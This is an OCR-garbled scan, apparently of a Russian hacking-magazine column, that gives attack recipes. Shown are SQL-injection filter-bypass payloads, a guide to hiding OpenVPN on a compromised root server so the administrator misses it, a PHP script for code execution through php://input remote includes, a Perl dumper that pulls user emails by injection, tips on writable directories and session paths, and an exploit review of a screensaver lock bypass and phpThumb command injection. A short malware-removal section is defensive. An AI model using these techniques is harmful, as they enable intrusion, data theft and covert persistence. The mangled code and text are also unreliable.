БЕЛОВ В 50Ы№ЕСТІ0Ы 



РЕШЕНИЕ: 

В прошлом номере я уже рассказал, как можно обойти фильтрацию запятых, но 
подобная фильтрация встречается крайне редко, совсем другой случай — филь- 
трация пробелов. Скажем, ты нашел инъекцию на крупном новостном портале, но 
никак не можешь ее раскрутить, так как все известные тебе варианты пробелов не 
работают. Давай рассмотрим такой код 



<?рЬр 

іб (іззеб ( $_СЕТ [ ' ісС ] ) && $_СЕТ [ ' ісЗ. 1 ]! = “){ 
іб (збгзбг ($_СЕТ[ ' і(Г ] ," ") {йіе "НАСКАЬЕЕТ"}; 

(зЬгзЬг ($_ОЕТ [^'Іса ’ ] ,«/**/") {біе "НАСКАЬЕЕТ"}; 
іб (збгзбг ($_СЕТ[ ’ ісГ ] , " + " ) {біе "НАСКАЬЕЕТ"}; 
іб (збгзбг ($_СЕТ[ ’ іб’ ] , "%20" ) { сііе "НАСКАЬЕЕТ"}; 



здесь какие-то запросы с использованием переменной $_СЕТ [ ' іб' ] 



%09 — бюгігопбаі баб, горизонтальная табуляция 
%0А — N6 Ііпе бееб, символ новой строки 
% ОВ — ѵегбісаі баб, вертикальная табуляция 
% ОС — ИР богт бееб, символ новой страницы 
%0Б - саггіаде гебигп, возврат каретки 

Все эти символы будут рассматриваться как пробельные. Пример запроса: 

іб=-1%0Аипіоп%0Азе1есб%0АІ 

С этим, я думаю, все понятно, перейдем ко второму варианту: 

2 . В Му50І_ есть возможность выполнять 506-код в блоке комментариев, выглядит 
это примернотак: 

зеіесб іб/* ! , бібіе*/ б г ош пемз 

В данном случае из таблицы пеѵѵз будут выведены поля іб и ббе. Теперь посмот- 
рим, какэто реализовать в боевыхусловиях: 



Какмы видим, при использовании пробелов " ",/**/, + и %20 скрипт прекращает 
свою работу. На самом деле существует как минимум два способа обхода такого 
скрипта, первый — использование различныхпробельных символов, второй — 
использование логи ки5С!І_ запросов, в частности их реализации в Му50І_. 

1 . Итак, первый способ. Помимо самого пробела существует множество различных 
пробельных символов, табуляция, возврат каретки и так далее. Вотихполный (а 
можети нет;]] СПИСОК: 



іб=-1/* !ипіоп*/зе1есб/* ! ѵегзіоп ( ) */ 

Но бывает и такое, что фильтруются символы слэша. Тогда можно использовать 
способ, основанный на использовании скобоквзапросе. Вотпример для обхода 
вышеизложенного скрипта: 

іб= (-І)ипіоп (зеіесб (ѵегзіоп () ) ) 




ЗАДАЧА: УСТАНОВИТЬ ОРЕЫѴРЫ НА 
ВЗЛОМАННЫЙ СЕРВЕР 



РЕШЕНИЕ: 

Задача интересная и в принципе ничем не отличается отустановки ОрепѴРМ 
на отдельный сервер, но все же мы ее рассмотрим. Итак, сплоит сработал, 
ѵѵбоаті показывает гооД и встаетвопрос: что же делать дальше :) ?. Хорошим 
выбором будет установка собственного ѴРІ\І-сервера. 

1. Для начала узнаем о поддержке модуля Шп: шобргоЬе бар && Ізшоб I 
дгер бар 

2 . Если все хорошо, то приступаем непосредственно кустановке ОрепѴРМ. 
Стоит проверить наличие библиотеки До, она используется для компрессии 
трафика: Іосабе Іго.зо 

3. Если он не установлен, то им можно и пренебречь, в таком случае трафик 
сжиматься не будет. Если же ты все-таки хочешь использовать сжатие, можешь 
поставить либу из исходных кодов. Скачиваем последнюю версию (ссылку 

не привожу, так как версии часто меняются] и устанавливаем также каки все 
другие программы на Ііпих. 



баг хзѵб 1 20 . бдг 

СсЗ. 1 20 

. /сопбідиге 



таке 

таке іпзбаіі 

4 . Итак, До установлено, теперьскачиваем последнюю версию орепѵрп и 
устанавливаем подобно До: 

баг хгѵб ѵрп.бдг 
ссі ѵЬЬ 
. /сопбідиге 
таке 

таке іпзбаіі 

5 . Серверустановлен. Теперь нужно сгенерировать все ключи и сертификаты 
для его работы. Переходим в папку/еіс/орепѵрп/, из папки с исходными кодами 
орепѵрп нужно скопировать сюда подпапки еазу-гза и затріе-сопбд-біез 
Переходим в папку/еіс/орепѵрп/еазу-гза и выполняем: 

. /ѵагз (загружаем переменные в оболочку) 

. /сіеап-аіі (отчищаем от старых сертификатов и ключей папку 
кеуз ) 

./Ьиііб-са (Создаем сертификат для сервера) 

. /Ьиііб-кеу-зегѵег зегѵег (Создаем сертификат Х.509 для сер- 
вера) 
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. /Ъиі1с1-кеу-рксз12 сІіепД (Создаем сертификат Х.509 для кли- 
ента) 

При генерации ключей будетспрашиваться Соттоп пате для клиента и 
сервера. Для клиента вписывай сііепі, для сервера зегѵег. 

6. Сертификаты и ключи созданы, теперь сгенерируем ключ Деффи Хельман 

./ЬиіІсі-сіЬ 

7. Все ключи и сертификаты сгенерированы, теперь создадим файл конфигу- 
рации. 

ДоисЬ. /еДс/орепѵрп/зегѵег . сопД 

И вносим в файл следующие изменения 

рогѣ 443 
ргоДо Дер 
сіеѵ Дар 

сірѣег БЕЗ-ЕБЕЗ-СВС 
гепед-зес 60 

са /еДс/орепѵрп/еазу-гза/кеуз/са . сгД 

сегД /еДс/орепѵрп/еазу-гза/кеуз/зегѵег . сгД 

кеу /еДс/орепѵрп/еазу-гза/кеуз/зегѵег . кеу 

сШ. /еДс/орепѵрп/еазу-гза/кеуз/(Ш2048 .регп 

зегѵег 10.10.200.0 255.255.255.0 

сІіепД-сопДід-сІіг ссѣ 

ризѣ " сИіср-орДіоп ББЗ 222.222.222.222" 

ризѣ "сИіср-орДіоп ББЗ 22 . 22 .222 .222 " 

ризѣ "гесІігесД-даДетау " 

кеераііѵе 10 120 

регзізД-кеу 

регзізД-Дип 

сошр-ізо 

ѵегЬ 0 

8. Включаем ір-форвадинги вносим изменения в ірІаЫез: 




Коннектимся к установлен ному ОрепѴРІЧ 



есДю 1 > /ргос/зуз/пеД/ірѵ4/ір_Догш.гсІ 

ІрДаЫез -Д паД -А РОЗТРОБТІЫС -з 10.10.200.0/24 -] ЗБАТ --До 
127.0.0.1 

127.0.0.1 нужно поменять на ір сервера , куда установлен ѴРБ 

9. Из папки с исходниками ѵрп/затріе-зегіріз файл орепѵрп.іпіі переименовы- 
ваем во что-то неброское (кпримеру, іпіД) и копируем в /еДс/іпіД.сІ/ 

Далее запускаем сервер: 

/еДс/іпіД . ѣ/іпіД зДагД 

10. Сервер работает, теперь необходимо настроить клиент. Настройку для 
различных ОСты можешь найти в Сети, ибо это тема отдельной статьи :]. Со- 
ветую предварительно поменять имя приложения ОрепѴРІМ также на что-либо 
неброское, чтобы администратор взломанного сервера не определил, что на 
его машине крутятся посторонние вещи. 



ЗАДАЧА: ВЫПОЛНИТЬ РНР-КОД ЧЕРЕЗ 
УДАЛЕННЫЙ ИНКЛУД 

РЕШЕНИЕ: 

Еще в далеком 2004 году на 5есигіІуІ_аЬ был опубликован способ, с помо- 
щью которого можно было выполнять произвольный рЬр-код посредством 
врапера рЬр://іприД Сейчас я расскажутебе, какэто работает. 

Итак, у нас есть уязвимый файл, ста ким содержимым: 




Бзег-АдепД : МозіІІа/4.0 (сошраДіЫе; МЗІЕ 6.0; Мпскжз №Г 5.1; 
МуІЕ2 ) 

НозД: ѵллм.ехашріе.сош 
СоппесДіоп: Кеер-АІіѵе 
Сасѣе-СопДгоІ : по-сасЬе 
<?рѣр рѣріпДо ( ) ?> 

В ответе сервера будет отображен вывод рЬріпЫ). 

2. Напишем РНР-скрипт для удобной работы со средой. 



<?рЪр 

ІД (іззеД ($_СЕТ[ 'раде' ] ) ) {іпсіисіе ($_СЕТ [ 'раде' ] ) ; } 

Когда мы передаем скрипту в параметре раде рЬр://іприѢ ѣддр: //ш. 

ехашр1е.сош/іпсіех.р]ір?раде=р]ір: //іприД . 

то происходитсчитывание и выполнение данных, посланных методом 
РОСТ. Грубо говоря, весь массив РОСТ становится файлом, и іпсіисіе 
подключаетего какобычный файл. Для проведения атаки мы должны 
отправитьспециально сформированный пакет. 

1. Сейчас мы отправим РНР-код методом РОСТ: 

РОЗТ / іпсіех . рѣр ?раде=р]ір : / / іприД НТТР/1.1 
АссерД-Бапдиаде: еп 

СопДепД-Туре : арр1ісаДіоп/х-тлПлм- Догш-игіепсосіесі 



<?рѣр 

1Д (іззеД ($_СЕТ [ 1 стсГ ] ) && іззеД ($_СЕТ [ ЧіозД ' ] ) && іззеД ($_ 
СЕТ [ ' зсгірД 1 ] ) ) { 

$ДюзД = зДгірзІазѣез (@$_СЕТ [ ' ДюзД ' ] ) ; 

$зсгірД = зДгірзІазѣез ( @$_СЕТ [ 1 зсгірД ' ] ) ; 

$сшй = ѣДт1зресіа1с]іагз_с1есос1е (зДгірзІазѣез (@$_ 

СЕТ [ ' стѣ ' ] ) ) ; 

$сшй = ’ <?рѣр 1 . $стсІ . 1 ?>'; 

$гедиезД = "РОЗТ /" . $зсгірД . "рѣр : //іприД " . " НТТР/1.1Х 

г\п" ; 

$гедиезД .= "АссерД-Бапдиаде: еп\г\п" ; 

$гедиезД .= "СопДепД-Туре: арр1ісаДіоп/х-ілПлм-Догш- 
иг1епсос1ес1\г\п" ; 
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ш 






Еагу 


Еагу 


Еазу 


Наск 


Наск 


Нзск 



$гедиезб .= "Изег-Адепб : МогіІІа/4.0 (сотрабіЫе; МЗІЕ 6.0; 
Міпбомз №Г 5.1; МуІЕ2 ) \г\п" ; 



»М1е ( ! беоб ($зоскеб) ) есбю бдебз ($зоскеб , 1024) 
бсіозе ($зоскеб) 1 



$гедиезб .= "Нозб: " . $бюзб . "\г\п"; 

$гедиезб .= "Сопбепб-іепдбЬ: ". збгіеп ($стб) . 
$гедиезб .= "Соппесбіоп: Кеер-АІіѵе\г\п" ; 
$гедиезб .= " Сасбе-Сопбгоі : по-сасЬе\г\п" ; 
$гедиезб .= " \г\п"; 

$гедиезб .= $стб . "\г\п"; 

$зоскеб = бзоскореп ($1юзб, $рогб ? $рогб : 80) ; 
брибз ($зоскеб, $гедиезб) ; 



" \г\п" ; 



} 

?> 



3. Запускаем его следующим образом: 

кббр : //Іосаібюзб/іприб .ркр?Дозб=шлд. ехатріе . 
сот&зсгірб=іпбех.р]ір?раде=&стб=р]іріпбо ( ) 



4. Наслаждаемся результатом :). 
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ЗАДАЧА: НАПИСАТЬУНИВЕРСАЛЬНЫЙ 
ДАМПЕР ТАБЛИЦ ЧЕРЕЗ ЗОЬ-ИНЪЕК- 
ЦИИ 



РЕШЕНИЕ : Оченьхорошо иметьусебя универсальный дампертаб- 
лицы, давайже напишем его. Привожу небольшой коде комментариями, 
которые помогуттебе разобраться в скрипте. 

# ! /изг/Ьіп/регІ 

изе ШР: :5ітр1е; #подгружаем пакет ШР: :5ішр1е для работы с Ьббр 
ореп ( ЕН , " >бшпр . бхб " ) ; #открываем файл на запись 
$1іт=0; # предопределяем переменную $1іт которая будет участво- 
вать в запросе в качестве Іітіб 
ѵбіііе(і) { #начинаем бесконечный цикл 

$иг1= "кббр : / /тт. ехатріе . сот/ргобііе . рЬр?іб=-1+ипіоп+зе1е 
сб+сопсаб ( ' сОбе 1 , ешаіі , 1 ебОс ' ) +бгот+изегз+1ітіб+$1іт, 1 " ; 

# Здесь мы указываем где именно находится ЗОЬ-инъекция , обрати 
внимание на объединение поля е-шаіі со строками, они будут ис- 
пользоваться регулярных выражениях 

$сопбепб = деб ( "$иг1" ) ; # выполним функцию деб ( ) , Она вернет 
содержимое загруженной страницы 

іб ($сопбепб =~ ш/сОбе ( . *) ебОс/) { # с помощью регулярки вытас- 



киваем значение поля ешаіі 

ргіпб ЕН $1 . " \п" ; # и заносим его в файл 

$1іш+ + ; # увеличиваем значение переменой $1іш на единицу 

} еізе { # если в исходном коде нет записей 

ргіпб 'Тобаі бишреб 1 . $1іш; # выводим общее количество сдамп- 
леных записей ехіб; # и прекращаем работу скрипта 
}} 

Вот и все! Какты видишь, скрипт довольно простой и будет работать в 
большинстве случаев, хотя иногда приходится переписывать под конк- 
ретный сайт. 

Немного переписанный вариантбитр-скрипта 



Файл Правда Вад Заиладкі' Сервис Насіройка Отпавъ 

га т я * ^ 

Оіір»ніГь ■Ссифкіітъ >ъ. іііііыіи ОгішпнГь ^гй: - 

1 #!/и9і"/Ып/рЕі‘1 

2 ЦНТ: :§1тр1е; 

1 

4 

& * и*і I* <1) [ 

& .--г-ел-СРН, чагміаі г.і: иі Ч . еле; 

} Іигі = см/ ?а=5гс8і6ъ = 5&апсН5$ 

В кйЛ((ПІ = ВііМигГ') : 

9 ?тла;іІі * ІСйіНеПІ •— іт . ' . * 7} гВѲС с; 

48 И (Ліп » 2*ВѲ0) ѵ Лп 1 

1( V н*п 1« | 

12 І54Г = П-М-. &ПЭ1І5; 

I? >1 (І5ІГ пѵ І5І=5и> \ 

14 = іііг: 
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ЗАДАЧА: НАЙТИ ПАПКИ И ФАЙЛЫ ДО- 
СТУПНЫЕ НА ЗАПИСЬ 



РЕШЕНИЕ: 

Решение: Во многих шеллах есть встроенные утилиты для поиска папокна 
запись, примерытому г57,с99 и другие. Все они работают по одному и томуже 
способу 

біпб . -регш -2 -буре -б -1з 

Такой поиск не всегда эффективен. На крупных порталах может быть 
не один, а множество пользователей и иногда есть шанс найти папку 
или файл, принадлежащий юзеру, от которого ты работаешь. Вот 



небольшой список команд, которые стоит выполнять вместе приве- 
денной выше. 

біпб . -изег шт -буре б -1з - поиск папок, у которых владелец тт 
біпб . -изег тт -регш /222 -буре б -1з — то же самое, но поиск 
ограничен папками доступными на запись 

біпб . -дгоир шт -буре б -1з — поиск папок, принадлежащих к 
группе тт 

біпб . -регш -а+ѵі -буре б -1з — поиск папок, доступных на запись 
всем (например, бг-хг-хгтос) 

Последний пример является лучшей заменой привычного бпб . -регт-2 
Пуре-б -Із, так как ищет нетолько бгѵѵхгѵѵхгѵѵх , но и другие комбинации с 
окончанием пл/х 



№6 



ЗАДАЧА: НАЙТИ ПАПКУ, В КОТОРОЙ ХРА- 
НЯТСЯ ФАЙЛЫ СЕССИЙ 



РЕШЕНИЕ : Как известно, файл сессии — хороший способ раскрутить 
локальный инклуд, но какже определить папку в которой они находятся? Ведь 
не всегда они хранятся в Дтр. Привожу излюбленные мной способы поиска 
заветной папки. 

1 . Поиск рЬріпбоО на сайте. Для этого ищем зеззіоп.заѵеДзапбІег. Если егозна- 
чениеустановлено в «бііез» по дефолту, значит сессии хрантся в файлах, ниже 
находится значение 5е55Іоп.5аѵе_раІЬ. Первое значение — это так называ- 
емое ЕосаІѴаІие.уникальнозначениедля конкретной папки и ее подпапок 
(либо для конкретного сайта], устанавливается в .Ыассезз. 



Второе значение — это МазІегѴаІие, общее значение для всего сервера, 
устанавливается в рбр.іпі. 

2. Поиск. Ыассезз, вэтом файле может быть установлено значение рбр_ѵаІие 
для зе55Іоп.заѵе_ра1:Ь. 

3. Простой перебор папок. Привожу небольшой списоквозможных вариантов 
каталогов, где может находиться желаемое. 

/бшр/ 

/рбр_зезз/ 

/бшр/рЬрзезз/ 

/бшр/рЬр/ 

/бшр/рЬр-зезз/ 

/бюше/%изегпаше%/бшр/ 
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/ѵаг/рЦрДетр/ 

/ѵаг/рЦрДтр/ 

/ѵаг/рЦрзезз/ 

/ѵаг/рЬр-зезз/ 

/ѵаг/ІіЬ/рЬр/ 

/ѵаг/ІіЪ/рЬр/ зеззіоп/ 

/ѵаг/ІіЬ/рЬрЗ 

/ѵаг/ІіЬ/ріірЗ /зеззіоп/ 

/ѵаг/1іЬ/р]ір4/ 

/ѵаг/1іЬ/р]ір4/ зеззіоп/ 

/ѵаг/ІіЪ/рЬрБ/ 

/ѵаг/ІіЪ/рЬрБ/ зеззіоп/ 

/ѵаг/ІіЬ/рЬрб/ 



/ѵаг/ІіЬ/рЬрб/ 

зеззіоп/ 

/тт/ рЦрзеззіоп/ 
С : \Тетр 

С:\ЩЫБ0М5\Тетр 
С: \РНР\ 
зеззіопйаРа 




рЬріпЫ) и значения сессий 




ЗАДАЧА: НАЙТИ НТТРО.СОЫР 



: $ {рійіііе : = /ѵаг/гип/ЬД1:рс12 .рій} 

: ${1одс1іг: =/ѵаг/1од/$рпаше} 

Ы:1:р(і_сопі=$ {АРАСНЕ_НТТРБ_СШЕ : -$зузсопі<1іг/]і1:1:рс1 . сопі} 



РЕШЕНИЕ: 

В Интернете существует множество баз возможных путей до конфига апача, но 
можно ли узнать путь с первой попытки? Иногда, да. Часто процессы, в том числе 
и арасЬе, запускаются через іпіі-демон, для этого в папке /еІс/іпіЕб/ должен 
находится ЬазЬ-скриптдля запуска приложений. И выглядитон примернотак: 

рпаше=арас]іе2 

: ${зузсопісІіг:=/е1:с/$рпате} 

: $ {арасЬ.е_1іпк : =/изг/зЬіп/Ы:1:рс12 } 

: $ { зузсопіід_арасііе : =/еСс/зузсопіід/$рпате} 



В данном случае конфи г находится в/е1с/арасЬе2/Ыірб.сопбТакжеты можешь 
(при наличии соот- 
ветствующих прав] 
посмотреть лог-файл 
теззадез, в котором 
также пишется назва- 
ние рабочего конфига. 

Или же просто набрать 
«ІосаІеШрб.сопЬи 
надеяться наудачу. 




№8 



ЗАДАЧА: ИЗБАВИТЬСЯ ОТ ТРОЯ НА 
ѴШІ.ОСК, НАЗОЙЛИВО ПРЕДЛАГАЮ- 
ЩЕГО ОТПРАВИТЬ ПЛАТНОЕ 
5М5-С00БЩЕНИЕ. 



РЕШЕНИЕ: 



Об этом вирусе писали все, кому не лень (и даже в СМИ]. Подобной заразой 
были инфицированы миллионы компьютеров, и вероятность того, что твой комп 
сегодня подхватиттакую заразу, очень велика (несмотря на установленные ан- 
тивирусы]. Обычнотакойтрой блокирует рабочий стол, выводя на нем надписьо 
блокировке компьютера по разным причинам (напоминание об использовании 
нелицензионного ПО, красочный порно-баннер, текстоб обнаружении вируса 
ит.п.]. Параллел ьно с этим троянчикблокируетзапуск редактора системного 
реестра, командной строки, диспетчера задач, запускантивирусных средств, 
предотвращает переход по ссылкам на сайты антивирусов, отключаетсервис 
«Восстановление системы» и делает массу подобных «приятных» мелочей :). 
Для излечения оттрояна главное — не посылать никаких сообщений (хотя в 
ряде случаев система действительно разблокируется, но обычно просто спи- 
шется 300-600 рублей без последующего излечения]. Вотнесколько способов по 
убийствуэтого трояна: 

1 . Попытайся воспользоваться бесплатным сервисом разблокировки, пре- 
доставленным лабораторией Касперского [ зиррогі.казрегзкѵ.ги/ѵігизез/ 
беЫоскег ] или любым другим. Если разблокировка выполнена удачно, удали 
все файлы, содержащиеся во временных каталогах всех пользователей («с:\ 

ѵѵіпбоѵѵзДетр», очисти папки «Тетр» 

Виртуальная машина в связке с т , , , гч 

ЗапЛохіе - лучшее средство от и «Тетрогагу Іпіегпе( Рііез», содержа- 

«нечисти» всех мастей :] щиеся в«с:\боситеп1запб зеШпдз\ 

имя_пользователя\ЕосаІ ВеШпдз»]. 
Также убедись в том, что в папках 
«Вузіет Ѵоіите Іпіогтабоп», которые 
находятся в корневыхдиректориях 
дисков, отсутствуют подозрительные 
объекты. 

2. Скачай и запиши ЫѵеСО-дистри- 
бутив, разработанный антивирусной 
лабораторией Данилова ТгеесІгѵѵеЬ. 




:от/Ііѵе< ], сконфигурируй ВІ05 для запуска с привода для оптическихдисков, 
загрузись с иѵеСО и выполни полную проверку системы. Также ты можешь вос- 
пользоваться любым Ыѵе-дистрибутивомѴѴіпбоѵѵз в тандеме с утилитой СигеК 
(либо программой ЕРЮ Ехріогег, прим. ред.). 

3. Если запусксистемы прошел удачно, выполни полную проверку компьютера 
антивирусом (бесплатный антивирусный пакетможно скачать здесь [геесі нл/еб- 
сот/сигеК ]. 

4. Включи редактор реестра, заблокированный вирусом, возможности команд- 
ной строки, «Диспетчер задач» следующим образом: нажми сочетание клавиш 
<ѴѴіп+Р>, в появившемся окне введи «дребіЕтзс». В появившемся окне выбери 
раздел «Групповая политика Конфигурация пользователя Административные 
шаблоны -> Система». Выполни двойной клик по строке «Сделать недоступными 
средства редактирования реестра», выбери вариант«Отключен» и подтверди вы- 
бор нажатием на кнопку«Ок». Аналогичным образом включается и работоспособ- 
ность командной строки. Чтобы включить диспетчер задач, нужно скорректировать 
параметр «Удалить диспетчер задач», находящийся в разделе «Групповая политика 
-> Конфигурация пользователя Административные шаблоны -> Система -> 
Возможности СМ-Ак-ОеІ». Также «Диспетчер задач» можно активировать при 
помощи «гедебіЕехе», если он уже разблокирован. Установи параметр «НКЕѴ_ 
СЕІВВЕМТ_СІ5ЕВ\5о^ѵѵаге\Місго50^\ѴѴіпбо\л/5\СиггепіѴег5Іоп\РоІісіе5\5у5Іепп\ 
ОізаЫеТазкМдг» в нулевое значение. 

5. Если большинство программ и после проделанной работы отказываются 
запускаться, проверь, что текстовый параметр Юе^аии], находящийся в ветках 
реестра: 

НКЕУ_СЬАЗ ЗЕЗ_КООТ \ехеі:і1е\з]іе11\ореп\ сопнпапй 

НКЕУ_С Ь АЗ 3 Е 3_КООТ \ехеіі1е\з1іе11\ г ипа з \ с оішпапсі 

имеетзначение "%1" %*. 

Главная причина заражения этим довольно опасным вирусом — невнима- 
тельность и пренебрежение безопасностью. Поэтому, если обновлениетвоей 
системы давно не выполнялось, набери в командной строкеѵѵиаисІЕехе/ 
беіесіпоѵѵ, чтобы запустить процесс вручную. Выполняй с правами админист- 
ратора только те программы, в безопасности которыхты уверен. Обнови базы 
антивируса, заранее подготовь иѵеСО-дистрибутив, содержащий антиви- 
русные утилиты. Но главное — перед запуском все файлы, полученные из 
непроверенных источников, проверяй на ѵі ги Біоіа Е со т .п-г 
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I Магіся 884888, ННр://гпіррег. ги 



ЕХРЮІТЗ 

КЕѴІЕѴѴ 




Г5 


1 





& 

ОБЗОР ЭКСПЛОИТОВ 

ВОТ И НАСТАЛ ОЧЕРЕДНОЙ РАЗ. КОГДА Я МОГУ ПОПРИВЕТСТВОВАТЬ ТЕБЯ НА СТРАНИЦАХ РУБРИКИ! СЕГОДНЯШНИЙ ОБЗОР ЭКСПЛОЙ- 
ТОВ БУДЕТ ПОСВЯЩЕН ВЕСНЕ И НЕУТОМИМЫМ БАГОКОПАТЕЛЯМ, КОТОРЫЕ В ЭТОТ СОЛНЕЧНЫЙ ДЕНЬ НЕ МОГУТ НЕ ПОРАДОВАТЬ ТЕБЯ 
ЕЩЕ ОДНОЙ ПОРЦИЕЙ РАЗЛИЧНЫХУЯЗВИМОСТЕЙ В ПОПУЛЯРНОМ СОФТЕ. ИТАК. РАСКРЫВАЙ ОКНО ПОШИРЕ. ЗАПУСКАЙ В КОМНАТУ 
СВЕЖИЙ И УЖЕ НЕ ЗИМНИЙ ВОЗДУХ И НАСЛАЖДАЙСЯ МАТЕРИАЛОМ! 






3.0.10, 3.2.5. 3.4.4. апй 3.5.2 ЗесшИу АіМюгу 

йя-ійі/, ДЩіігѵ ЗЪ ИЙ 



ий Ьт ■ 1 



Бнитііу Агіѵй 



К РйгЕПйЫп? * №4 14 Ш Дон? -М І5 пѵіц 
ію еМесъ іС ЪЬе цтоир ів пе* ішей Ьѵ Ьог 



Видгіііа асіѵізогу 




ТЬІ5 ІвЕ іі (ал Іопд Іоі ВидгіІІл'з Лик іиівіі; ІІіе НехЕ/Ргеѵ/ТігііДііІ ЬиЕЕли мап'(арр«лі ла іинішніи 
Ьид*. 




Интерфейс Видгіііа 




ОБХОД ОГРАНИЧЕНИЙ БЕЗОПАСНОСТИ 
В 6М0МЕ-5СРЕЕЫ5АѴЕР 




ВЫПОЛНЕНИЕ ПРОИЗВОЛЬНЫХ КО- 
МАНД В РНРТНУМВ 



Споте-зсгеепзаѵег — это популярный хранительэкрана 
ВІМОМЕ, который входит, к примеру, в комплект последних версий 
ореп51І5Е и позволяетзаблокировать текущий экран с последующим 
вводом пароля для разблокировки. Нетакдавно во всех версиях (до 
2.28.2 включительно] данного скринсейвера был обнаружен забавный 
баг, заключающийся втом, что любой юзер с физическим доступ ксисте- 
ме может получить доступ кзаблокированному рабочему столу, не зная 
нужного для разблокировки пассворда. Для этого трюка необходимо 
лишь несколько раз в определенной последовательности отключить и 
подключить монитор и нажать несколько клавиш. 



0обственно, уязвимость связана сошибкойв реализации функции б к 
\А/іпсІоѵѵ_Ьедіп_ітрІісіІ_раіпШ (входит в состав 0ТК+], которая нередко 
пытается отрисовать что-либо в несуществующем окне и неизбежно 
рушится :) 



ЕХРЮІТ 



(Один из способов эксплуатации бага (в случае с системой с 
двумя экранами] описан секьюрити -командой ѵідіІапсеТг : 

1. Переводим курсор мыши на второй экран (форма для ввода пароля 
должна отображаться на этом экране]; 

2. Отключаем этот второй экран; 

3. Нажимаем несколько любых клавиш на клавиатуре; 

4. Окринсейвер пытается обработать пользовательский ввод с этих кла- 
виш на несуществующем экране, что приводит кего краху и получению 
доступа к сессии другого пользователя. 

Другой способ заключается в нажатии и удерживанию в течение 
нескольких секунд клавиши «Епіег», что, опять же, приводит к краху 
хранителя экрана. 



ТАК6ЕТ5 



дпоте-зсгеепзаѵег <=2.28.2 



ЗОШТІОЫ 



| Для решения проблемы разработчики скринсейвера реко- 
мендуютобновиться до его последней версии (на данный момент2.28.3] 
с официального сайта Ііѵе.дпоте.огд/ВпотеЗсгеепзаѵег/. 



рбрТЬитЬ (рбріЬитЬ.зоигсеіогде.пеІ:/] — это популярнейший 
класс РНР (используется, например, в Ріоддег и ТіпуЕсІіІог], который 
позволяет«на лету» проводить различные манипуляции с картинками 
в форматах В ІЕ, б РЕВ, РЫВ, В МР, 100. Все эти манипуляции проходят с 
помощью встроенной в РНР-библ потеки О и, либо с помощью внешней 
программы ІтадеМадіск, которая в настоящее время установлена по 
дефолту в большинство *піх систем. 

Ты, наверное, знаешь, что любые манипуляции со внешними про- 
граммами в РНР происходят с помощью функций раззібги, зузіет, 
зЬе[[_ехес, ехес (именно они работаютс командной строкой] и что во 
многих случаях в передаваемые этим функциям параметры можно внед- 
ритьсвои команды. Класс рЬрТбитЬ в данном случаетоже не является 
исключением, тем более, что по дефолту он пытается использовать 
ІтадеМадіск вместо ВО. 

Итак, для начала рассмотрим файл ./рЬріЬитЬТипсбопз.рбр и найдем 
функцию, отвечающую за выполнение внешних команд: 

РипсСіоп ЗаРеЕхес ( $сошшап<Т) { 

$АІ1омесІЕхесРипсЦіопз = аггау ( ' зЬе11_ехес ' =>Сгие , 

' раззСЬги ' =>Сгие , ' зузСет ' =>Сгие , ' ехес ' =>Сгие) ; 

РогеасЪ. ( $АІ1отлге<іЕхесРипсЦіопз аз $ехесРипсСіоп => $із_ 
аіісжесі) { 

зміСсЬ ( $ехес:ЕипсСіоп) { 
сазе ' раззСЬги' : 
сазе ' зузСеш' : 

оЬ_зСагС ( ) ; 

$ехесРипсСіоп ( $соішпап<і) ; 

$геСигпѵа1ие = оЬ_деЦ_согШепСз ( ) ; 
оЬ_епс!_с1еап ( ) ; 

Ьгеак; 
сазе ' ехес 1 : 



► 038 
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ЮІТ5 

ЕѴѴ 




Начало 


Переход на сайт С 


> скрипте 


Включить сиз редактор 


Файл браузер 



ОАМЫЕО^ 

СИСТЕМА УБАВЛЕНИЯ САЙТОМ 



Управление контентом ; 



/ Новости 
/ Статьи 
Файлы 
^ Ссылки 
і и Опросы 
д Фото-медиа 

Информационные страницы 
л Пользователи 
»; Управление баннерами 
« Комментарии 
Рассылка 

0 Вопросы-ответы 



Управление системой : 



О Настройки 



Общие настройки 

Админка Раппео СМ5 



Обіщ« настрой и Управ лен*е модами Управление И 



* Название сайта : 
* УРЛ сайта : 



Вов сайт 

Шрі/Аіагістйти 




* Е-МЫІ сайта ; 



уоиг^таіілі 

консультация, аудит, продан 



Ключевые слова : 



Описание : 



Последим* гомиеиі^иііі - 2 
♦«дон 

ІоМо| 

829614<ІМсвЬм08666240ОЬ2 <ІЗеТ452 
Доолвшь коииемілімлі 



Результат проведения зці инъекции в йаппео 
СМ5 



Стр***; 1 



Стр***;: 1 



Шаблон оформлет 
Мод на главной 



Информационны 

копирайт : 




ш*і наіі в і и ♦ • 



Добавить X 



$ехесІипсЫоп ( $сошшапс1, $оикрик) ; 

$гекигпѵа1ие = ітріосіе ( " \п" , $оикрик) ; 

Ьгеак; 

сазе 1 зЬе11_ехес ' : 
оЬ_зкагк ( ) ; 

$гекигпѵа1ие = $ехесіипсЫоп ( $соштапсі) ; 
оЬ_епс!_с1еап ( ) ; 

Ьгеак; 

} 

} 

Данный код в цикле перебирает перечисленные выше системные 
функции РНР и выполняетзаданную команду через любую доступную 
из них (что, кстати, бываетполезно, если в директиве сПзаЫеДЬпсбопз 
админы отключили все «опасные» функции, кроме, к примеру, раззіЬги). 
Как видно, никаких проверок на корректность команды при этом не 
проводится — она просто передается на исполнение. 

Идем дальше. Теперь нам необходимо найти такое место в рбрТЬитЬ, 
куда мы сможем безбоязненно внедрить свои произвольные команды. 
Такой кодлегко находится в рЬріЬитЬ.сІазз.рбр: 

ІипсЫоп ІтадеМадіскТЬишЬпаіІТоСВ ( ) { 



ІогеасЪ. ( $кЬіз->^1кг аз $Іі1кегкеу => $Іі1кегсоштапсі) { 
@1ізк ( $сошшапЬ, $рагашекег) = ехріосіе ( ' I 1 , 
$ІіІЦегсоштапс1, 2); 

//параметры, передаваемые ІшадеМадіск 
зЫксЬ. ($соттапЬ) { 

сазе ' Ыиг ' : 

Ш ( $кЬіз->ІтадеМадіскЗЫксЬАѵаі1аЫе ( ' Ыиг ' ) ) { 
@1ізк ( $гас!іиз ) = ехріосіе ( 1 I 1 , $рагатекег) ; 

$гас!іиз = ($га<ііиз ? $гас!іиз : 1) ; 

$соттапс11іпе .= ' -Ыиг ' . $гайіиз ; 
ипзек ( $кЬіз->І1кг [ $Іі1кегкеу ] ) ; 

} 

Ьгеак; 

$кЫз->БеЬидМеззаде ( * ІшадеМадіск саІІеЬ аз 

( ' . $сотшапЫіпе. ' ) ' , ЕІЬЕ , ЬШЕ ) $ 

$ІМгези1к = рЬркЬитЬ_Іипскіопз : : ЗаіеЕхес ( $соттапс11іпе 
) ? 

